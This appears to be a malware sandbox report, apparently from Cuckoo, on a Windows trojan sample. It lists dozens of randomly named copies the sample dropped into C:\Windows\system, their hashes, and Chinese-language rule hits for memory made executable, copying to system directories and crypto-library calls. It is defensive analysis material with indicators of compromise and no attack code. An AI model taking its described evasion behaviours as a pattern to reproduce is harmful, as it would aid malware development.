sha256: fbc4cf694659e9aade59519ed0a8c7df3d25f08554774892cf5f881082abc29e
size: 2068136
this_path: /data/cuckoo/storage/analyses/2000083/files/1000/pVvHVXx.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 6c6847e49fe894aeadb6e19b9db040a6
name: XIunuLE.exe
new_size: 2019KB (2068389bytes)
operation: 修改文件
path: C:\Windows\system\XIunuLE.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 84e7dfe4def8fe64842eccd6e558fb0768584701
sha256: 08c613b1944498843d56f459bf74452eaf9538269a8c466b630266d8c3f56139
size: 2068389
this_path: /data/cuckoo/storage/analyses/2000083/files/1001/XIunuLE.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 9e4e1803eb9798b7c4d36c02df1fdf51
name: jXGapzX.exe
new_size: 2020KB (2068642bytes)
operation: 修改文件
path: C:\Windows\system\jXGapzX.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 2ba29e9878f694190c450f9ea4c515074451e414
sha256: d45ac62ad624cd52959f0692119df64e8204c0e42d804f8b0cfb2c8810f45998
size: 2068642
this_path: /data/cuckoo/storage/analyses/2000083/files/1002/jXGapzX.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: fa874c6d03e2937a3a68056e95bbffb4
name: tGqMkEe.exe
new_size: 2020KB (2068895bytes)
operation: 修改文件
path: C:\Windows\system\tGqMkEe.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: c908caedda79e074fd468c7a4db30654b8b1c944
sha256: 5629c47d9ef9a50926c639fe6dcf5510e4ba5b0c73d097134ef7f52a36b26902
size: 2068895
this_path: /data/cuckoo/storage/analyses/2000083/files/1003/tGqMkEe.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 2dfe956b3634d9e5b4f367255220c8aa
name: WYAFryj.exe
new_size: 2020KB (2069148bytes)
operation: 修改文件
path: C:\Windows\system\WYAFryj.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: b8d70550b25ba8cccf3e4fcdf7777ca851411999
sha256: 69fb3dcdbcac185e57ce5c5ff8df5f235c56a8ad5f34b59f3083d74b69ea3439
size: 2069148
this_path: /data/cuckoo/storage/analyses/2000083/files/1004/WYAFryj.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: e523496ecc8ac6406ebe4bc6fefe39fd
name: tEyUWct.exe
new_size: 2020KB (2069401bytes)
operation: 修改文件
path: C:\Windows\system\tEyUWct.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: de678d67108b6cc278b15ae53c730a548cae285a
sha256: f851e137e7c6a083da293e7de5768a61653be76befb757da1e61ba1b23aed124
size: 2069401
this_path: /data/cuckoo/storage/analyses/2000083/files/1005/tEyUWct.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: cf7b24990c301fe6d20b719b27077f82
name: QTrpNtY.exe
new_size: 2021KB (2069654bytes)
operation: 修改文件
path: C:\Windows\system\QTrpNtY.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 6c9952fd2baa243c576b990f2c4c3cad05d76145
sha256: 52ecd234de9b1e0bd3db563a5fa2106b995b3e8da911ef7e5a5a7c7e3d1811f6
size: 2069654
this_path: /data/cuckoo/storage/analyses/2000083/files/1006/QTrpNtY.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: f4efcd1b7a41be3fee04bf75d17c9ba0
name: YuFgYGd.exe
new_size: 2021KB (2069907bytes)
operation: 修改文件
path: C:\Windows\system\YuFgYGd.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 084884db82c5167d6398e2a661962f1b0896ef88
sha256: 0442245407b7ecf80acc2368e817c88c5246f0e3f0df9188c8f307aeb3d770dd
size: 2069907
this_path: /data/cuckoo/storage/analyses/2000083/files/1007/YuFgYGd.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: fc1509e1e959da7694325811eb29b8aa
name: bjmXdBD.exe
new_size: 2021KB (2070160bytes)
operation: 修改文件
path: C:\Windows\system\bjmXdBD.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 363c6e4cfc8735f26e98ffce56e737b605c3ab31
sha256: 56f97b91475fdb3bfbba77533cfc082e48093d4dae5aea7c373a3597a18769cb
size: 2070160
this_path: /data/cuckoo/storage/analyses/2000083/files/1008/bjmXdBD.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 416ad17cc4b5729588a07cd8ad50b24c
name: CLeZCRX.exe
new_size: 2021KB (2070413bytes)
operation: 修改文件
path: C:\Windows\system\CLeZCRX.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 8bc496c33bc233214507761a90bfea145f66d313
sha256: bf8cce6bb7aaa66699e5bb3e89963b6cf2a77b40fa818e29bebf97553d1e7b74
size: 2070413
this_path: /data/cuckoo/storage/analyses/2000083/files/1009/CLeZCRX.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: b3f8641d689102a114d176cc46cf1a2b
name: GWAmqsL.exe
new_size: 2022KB (2070666bytes)
operation: 修改文件
path: C:\Windows\system\GWAmqsL.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: f18383576c3de34674c824ceda85515157c2b03e
sha256: 0440aad59e90972d5d3072c4d8248288cb0ffc57421cf29b2d8493a9d8e4b24a
size: 2070666
this_path: /data/cuckoo/storage/analyses/2000083/files/1010/GWAmqsL.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 3eb8b02bfdb0cc119b4336f94671f896
name: QPZwHlA.exe
new_size: 2022KB (2070919bytes)
operation: 修改文件
path: C:\Windows\system\QPZwHlA.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: d0a8d8ecbaf722818d3bb37c97d2e7ea1f54d2dc
sha256: b81b4119cf9a64eaa263965813935cee43de566ccaec8d90cb8db89b9f56be53
size: 2070919
this_path: /data/cuckoo/storage/analyses/2000083/files/1011/QPZwHlA.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 3a1f748fe0c3a550d9538a9901ef1951
name: FiebfRo.exe
new_size: 2022KB (2071172bytes)
operation: 修改文件
path: C:\Windows\system\FiebfRo.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 3e91b9daaa71cea93f6c913769af4c4d18d8ab4e
sha256: 953ed82a14f7feacef751967105a736794ac193e294f2a8d5bcca44be081006c
size: 2071172
this_path: /data/cuckoo/storage/analyses/2000083/files/1012/FiebfRo.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 6bbe2cb903434c47e39aa62ce117871e
name: nfHJuJN.exe
new_size: 2022KB (2071425bytes)
operation: 修改文件
path: C:\Windows\system\nfHJuJN.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 830b4e159b13c602d091633628106253fa6632bd
sha256: c8731316e9806d6f6b0cb66b5ac21e1dcb6e04cfd36a426ef4dd58e4a67bd736
size: 2071425
this_path: /data/cuckoo/storage/analyses/2000083/files/1013/nfHJuJN.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 905ea2f69cf0351045b2f477f3e4b955
name: TyMjkQV.exe
new_size: 2023KB (2071678bytes)
operation: 修改文件
path: C:\Windows\system\TyMjkQV.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 96c11822c8e467f8dde17e6b11a5a4c34e79586c
sha256: faefeeb6b34341475dccdb934636178e2caca902382a38d0a4678cd7a9909955
size: 2071678
this_path: /data/cuckoo/storage/analyses/2000083/files/1014/TyMjkQV.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 192160161ef4cf6aed964187952848bf
name: loAnxnj.exe
new_size: 2023KB (2071931bytes)
operation: 修改文件
path: C:\Windows\system\loAnxnj.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 35aa38778f7f96184d250df13e5506e6990b8606
sha256: 652498fb4d33a230a34f94f6ab1d8bb90b898b9ef3804efab32ee9b3c73d2ab0
size: 2071931
this_path: /data/cuckoo/storage/analyses/2000083/files/1015/loAnxnj.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: be21434b5404b5eddf3c7d72d18e2cd4
name: evVewtT.exe
new_size: 2023KB (2072184bytes)
operation: 修改文件
path: C:\Windows\system\evVewtT.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 3dcf24dd89888bce1c69211934052cd198f0c625
sha256: 77942046199c56e8ab10c600df720d62719be1eacb4a120a2b7039e4327948cf
size: 2072184
this_path: /data/cuckoo/storage/analyses/2000083/files/1016/evVewtT.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 8e0dcac874906126b3f234762ef7dc36
name: soaakCH.exe
new_size: 2023KB (2072437bytes)
operation: 修改文件
path: C:\Windows\system\soaakCH.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: df03d8f6434b14badb3c793d81939871951e8ade
sha256: 400d52d87e4a24c34fda2b699580dc1dd0e3110d693dd530146583341583a21d
size: 2072437
this_path: /data/cuckoo/storage/analyses/2000083/files/1017/soaakCH.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 3a8c3086f54ad3305756d77b52cb53a8
name: cepsWcl.exe
new_size: 2024KB (2072690bytes)
operation: 修改文件
path: C:\Windows\system\cepsWcl.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: e466d25d3e7d582bb7673f424166134a56eb1066
sha256: 6910eaf1b8d09c2c1d3280c214f5b6161c12ac0082c7f5b1a3cd1ba113da36a0
size: 2072690
this_path: /data/cuckoo/storage/analyses/2000083/files/1019/cepsWcl.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 5999ff4e74cbccd492be21061af5550f
name: dKYPoTY.exe
new_size: 2024KB (2072943bytes)
operation: 修改文件
path: C:\Windows\system\dKYPoTY.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: f2e755f3e8eb64ff6ecbe5f9b23198268504b0f8
sha256: c0b5bd308f4765c817a2def27789906d3fcb1c72c0a8fa79d8d944fca90cc957
size: 2072943
this_path: /data/cuckoo/storage/analyses/2000083/files/1020/dKYPoTY.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 861773b572d19976b30dc914d960d03b
name: LAoljGR.exe
new_size: 2024KB (2073196bytes)
operation: 修改文件
path: C:\Windows\system\LAoljGR.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: eb214c56e1d4dd1a4a3731909bc3092cfa5c47fd
sha256: f8583a8b13184945293bdb30bd78fcace3b214b4f96156b6ed11dc1840836fdd
size: 2073196
this_path: /data/cuckoo/storage/analyses/2000083/files/1021/LAoljGR.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 584de2a81dc73cfbf5cdcb3e987fda74
name: ZChGZRz.exe
new_size: 2024KB (2073449bytes)
operation: 修改文件
path: C:\Windows\system\ZChGZRz.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 22dd5cd9abe99061841c1fa73beba84085d87b0b
sha256: 226c7d4547c6e88a2872a37c58870980d35f2a67b1d4a55ad755df79a189874f
size: 2073449
this_path: /data/cuckoo/storage/analyses/2000083/files/1022/ZChGZRz.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 19e7bd2b742fbd3f14ec41526008dfe9
name: nVqBEZq.exe
new_size: 2025KB (2073702bytes)
operation: 修改文件
path: C:\Windows\system\nVqBEZq.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: c4cd1d955cffa7a57cf3d7149c60fea4dfffbc5b
sha256: f93b30434c2b0a2b32512a4922d78d11ce52117dbe715bdc836bb4a5fcc68169
size: 2073702
this_path: /data/cuckoo/storage/analyses/2000083/files/1023/nVqBEZq.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: fd3a5adce27196659899cf317cfb4b7b
name: vfTeZBV.exe
new_size: 2025KB (2073955bytes)
operation: 修改文件
path: C:\Windows\system\vfTeZBV.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: f6e47f38fa841dc2bc683e08d0ce601c50e05318
sha256: ef2ed9bf0c373b735b946429d499575eac6644eba65f277879d6650014d96568
size: 2073955
this_path: /data/cuckoo/storage/analyses/2000083/files/1024/vfTeZBV.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: b7bcb9e1a73a3fa87373b67d477e7db0
name: sjvOSaD.exe
new_size: 2025KB (2074208bytes)
operation: 修改文件
path: C:\Windows\system\sjvOSaD.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: f197c3edb99b5dda756c638b89f4a4d8cbbe7840
sha256: cb7d38d2cb679dbaa32f1e3a40271c7c94da92c9780318ec2ce397ede6a95a6d
size: 2074208
this_path: /data/cuckoo/storage/analyses/2000083/files/1025/sjvOSaD.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: ba3d249ef178d9b7d8666e5edd0ee7dc
name: xHbIQiT.exe
new_size: 2025KB (2074461bytes)
operation: 修改文件
path: C:\Windows\system\xHbIQiT.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 2cc07c136570179026d2742cdd1bd1df36b3971f
sha256: 1da85ccb42545b54ac7df9064f4d462ca8648795158995d0533de3a8e0521ef0
size: 2074461
this_path: /data/cuckoo/storage/analyses/2000083/files/1026/xHbIQiT.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 441e582e0955f076edeaa84d2df0bd27
name: eazKPGK.exe
new_size: 2026KB (2074714bytes)
operation: 修改文件
path: C:\Windows\system\eazKPGK.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 15393a718910f0f724cecde4b68e20f7793860fd
sha256: af72f9381d5461d42afa54fe6c45ce144a8fbc6d9d7e5cf4d18cd3b049f1369d
size: 2074714
this_path: /data/cuckoo/storage/analyses/2000083/files/1027/eazKPGK.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 04d16e07f390785d08fab9a5023ca1ff
name: STZCYrB.exe
new_size: 2026KB (2074967bytes)
operation: 修改文件
path: C:\Windows\system\STZCYrB.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: 41f82c4b7f5a78343c6d383bf1122bf7a36993d4
sha256: a888d0d63591b751515977ae12b6007a3e908d49ca18e51dd55a2bf8185dbb5f
size: 2074967
this_path: /data/cuckoo/storage/analyses/2000083/files/1028/STZCYrB.exe
type: PE32+ executable (console) x86-64, for MS Windows
analysis_result: HEUR:Trojan.Win32.Generic
create: 0
how: write
md5: 7855cbd45ce93a65f29054c2c1d22ffc
name: MjEVFLO.exe
new_size: 2026KB (2075220bytes)
operation: 修改文件
path: C:\Windows\system\MjEVFLO.exe
processid: 2440
processname: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
sha1: d43a84bc5209061147da4d865148b0331f310389
sha256: 8eeb370edc1c90a0cb9aa1d24c8fbda5182289e9839f3cbdc1e0f6076571749e
size: 2075220
this_path: /data/cuckoo/storage/analyses/2000083/files/1029/MjEVFLO.exe
type: PE32+ executable (console) x86-64, for MS Windows

 Malicious

attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2440
process_name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 防御逃逸
level: 2
matchedinfo: 恶意程序通过拷贝文件到系统目录的方式,以达到隐藏恶意文件的目的
num: 396
process_id: 2440
process_name: 1618997412964_41fd78c21175a7e58ea1946742610061.exe
rulename: 拷贝文件到系统目录
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 一般被用于文件的加密、数据的加密传输或可能被用于勒索者病毒中
num: 5327
process_id: 2144
process_name: powershell.exe
rulename: 调用加密算法库
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 5517
process_id: 2144
process_name: powershell.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 2
matchedinfo: 恶意程序通过从资源段释放资源到内存中,进行解密操作
num: 6285
process_id: 2144
process_name: powershell.exe
rulename: 加载资源到内存
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2776
process_name: pVvHVXx.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 1936
process_name: XIunuLE.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 1836
process_name: jXGapzX.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2236
process_name: tGqMkEe.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2260
process_name: WYAFryj.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 1840
process_name: tEyUWct.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2160
process_name: QTrpNtY.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 1628
process_name: YuFgYGd.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 1476
process_name: bjmXdBD.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 952
process_name: CLeZCRX.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2472
process_name: GWAmqsL.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2040
process_name: QPZwHlA.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2832
process_name: FiebfRo.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 1880
process_name: nfHJuJN.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2368
process_name: TyMjkQV.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2428
process_name: loAnxnj.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2608
process_name: evVewtT.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2764
process_name: soaakCH.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 1216
process_name: cepsWcl.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 1612
process_name: dKYPoTY.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2932
process_name: LAoljGR.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2680
process_name: ZChGZRz.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 1580
process_name: nVqBEZq.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2648
process_name: vfTeZBV.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2636
process_name: sjvOSaD.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 1860
process_name: xHbIQiT.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2356
process_name: eazKPGK.exe
rulename: 修改内存地址为可读可写可执行
attck_tactics: 其他恶意行为
level: 1
matchedinfo: 恶意软件通过修改内存属性,以达到在内存中解密&执行恶意代码
num: 292
process_id: 2704
process_name: STZCYrB.exe
rulename: 修改内存地址为可读可写可执行